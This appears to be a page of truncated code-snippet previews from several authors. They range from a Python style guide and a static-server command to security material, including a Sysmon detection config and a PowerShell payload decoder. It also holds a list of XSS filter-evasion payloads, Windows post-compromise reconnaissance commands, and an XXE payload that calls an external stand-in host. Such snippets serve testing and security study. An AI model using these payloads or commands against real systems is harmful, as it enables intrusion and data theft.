JohannesHoppe

<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>        
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>

willurd

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000

trietptm

import urllib2, re
import urllib
opener = urllib2.build_opener()
opener.addheaders.append(('cookie', 'fusion_visited=yes;PHPSESSID=myPHPSESSID;fusion_user=myfusion_user;__atuvc=my__atuvc'))
response = opener.open('http://securityoverride.org/challenges/programming/7/index.php','')
data = response.read()
regex = r"<code style='white-space:nowrap'>.*</code>"
result = re.search(regex, data, re.DOTALL)
result = result.group(0)
result = result.replace('\n', '')

sloria

The Best of the Best Practices (BOBP) Guide for Python

A "Best of the Best Practices" (BOBP) guide to developing in Python.

In General

Values

• "Build tools for others that you want to be built for you." - Kenneth Reitz
• "Simplicity is alway better than functionality." - Pieter Hintjens

sckalath

// What system are we connected to?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

// Get the hostname and username (if available)
hostname
echo %username%

// Get users
net users
net user [username]

mtnmts

# Author  : Matan M. Mates
# Purpose : Solve Stego75
import Image

# Color ladders
LADDER_RANGES = [((1,0) ,   (56,55)), 
			     ((57,0),  (112,55)),
			     ((113,0), (168,55)),
			     ((169,0), (224,55)),
			     ((225,0), (280,55)),

Neo23x0

<!-- 
   This is a Microsoft Sysmon configuration to be used on Windows workstations
   v0.2.1 December 2016
   Florian Roth (with the help and ideas of others)
   
   The focus of this configuration is 
   - malware detection (execution)
   - malware detection (network connections)
   - exploit detection
   It is not focussed on 

psx.py

## hacked together by @JohnLaTwC, Nov 2016, v 0.5
## This script attempts to decode common PowerShell encoded scripts. This version handles:
##  * base64 data which encode unicode, gzip, or deflate encoded strings
##  * it can operate on a file or stdin
##  * it can run recursively in the event of multiple layers
## With apologies to @Lee_Holmes for using Python instead of PowerShell
## 
import sys
import zlib
import re

leftp

#DISCLAIMER
#I'm not the original author of the script... 
#Original git repo vanished

function String-to-ByteArray ($String)
{
	$ByteArray=@()
	For ( $i = 0; $i -lt ($String.Length/2); $i++ ) 
	{
		$Chars=$String.Substring($i*2,2)

cokebottle

--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>